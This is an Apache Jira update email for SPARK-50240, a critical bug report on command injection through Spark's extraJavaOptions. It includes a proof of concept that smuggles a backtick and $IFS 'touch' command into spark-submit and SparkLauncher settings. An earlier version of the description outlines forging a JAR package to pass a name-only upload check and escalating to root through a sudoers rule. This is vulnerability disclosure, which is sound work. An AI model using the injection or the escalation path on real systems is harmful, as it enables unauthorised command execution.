[
https://issues.apache.org/jira/browse/SPARK-50240?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Xiaotong updated SPARK-50240:
-----------------------------
Affects Version/s: 3.5.1
(was: 3.5.3)
Description:
We found that Spark allow user to upload jar packet with`extraJavaOptions` ,
When instantiating a JAR package, use the javaOption configuration construct to
execute the command if you configure the advanced optional parameters:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch
/tmp/zzz123' into the bash -c execution command.
Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
for java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`"); {code}
Spark execution location:
!image-2024-11-12-10-49-35-069.png!
was:
We found an attack path, which can follow the customized Spark rules, upload
fake JAR package, and escalate privilege to cperform command injection attacks.
*Attack Path:*
# Obtain the common CAE user permission
# Fake JAR packages and XML based on customized Spark rules
# Compress the jar package and xml, and upload it to CAE for instantiation
# Run the fake instance
# The instance calls the JAR package to perform command injection
*Attack Implementation:*
During uplaod, only the name of the package is verified
{code:java}
// File localFile = new File(ValidFileName)
if(!StringUtils.endsWith(localFilePath, suffix:"com.xxx.xxx.xxx.jar") &&
!StringUtils.endsWith(localFilePath, suffix:"xxxxx"))
xxxx
return xxxx{code}
Forge JAR packages and validate XML
{code:java}
<?xml version="1.0" encoding="utf-8"?>
<rule>
<rule>
<rulename>TestApp</rulename>
<uri></uri>
<jarname>com.xxx.xxx.xxx.jar</jarname>
<sparkjobclassname>com.xxx.xxx.TestApp</sparkjobclassname>
... ...{code}
Injection at runtime
{code:java}
CAEcluster1:/home/sshuser # ll /tmp/target
-rw-r----- 1 streaming universe 0 Aug 6 10:32 /tmp/target
CAEcluster1:/home/sshuser #{code}
Escalate privileges to the root user
{code:java}
CAEcluster1:/etc/init.d # ll
... ...
-rwx------ 1 streaming universe 7044 Jul 11 12:09 rcstreaming.sh
... ...
CAEcluster1:/etc/init.d #{code}
{code:java}
CAEcluster1:/etc/init.d # cat /etc/sudoers /etc/sudoers.d/* | grep
rcstreaming.sh
streaming ALL=(root) NOPASSWD: /etc/init.d/rcstreaming.sh
CAEcluster1:/etc/init.d #
{code}
Issue Type: Bug (was: Improvement)
Summary: Command Execution Vulnerability in Spark (JavaOptions)
(was: Injection issues caused by uploading a fake jar package)
> Command Execution Vulnerability in Spark (JavaOptions)
> ------------------------------------------------------
>
> Key: SPARK-50240
> URL: https://issues.apache.org/jira/browse/SPARK-50240
> Project: Spark
> Issue Type: Bug
> Components: Spark Submit
> Affects Versions: 3.5.1
> Reporter: Xiaotong
> Priority: Critical
>
> We found that Spark allow user to upload jar packet with`extraJavaOptions` ,
>
> When instantiating a JAR package, use the javaOption configuration construct
> to execute the command if you configure the advanced optional parameters:
> {color:#808080}spark.executor.extraJavaOption:{color}
> {code:java}
> \'touch\$IFS/tmp/zzz123|'{code}
> The instance executes the jar package, uses the Yarn mode, and injects 'touch
> /tmp/zzz123' into the bash -c execution command.
> Command as:
> {code:java}
> spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
> spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
> for java:
> {code:java}
> sparkLauncher.setConf("spark.executor.extraJavaOptions",
> "`touch$IFS/tmp/zzz123`"); {code}
> Spark execution location:
> !image-2024-11-12-10-49-35-069.png!
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org
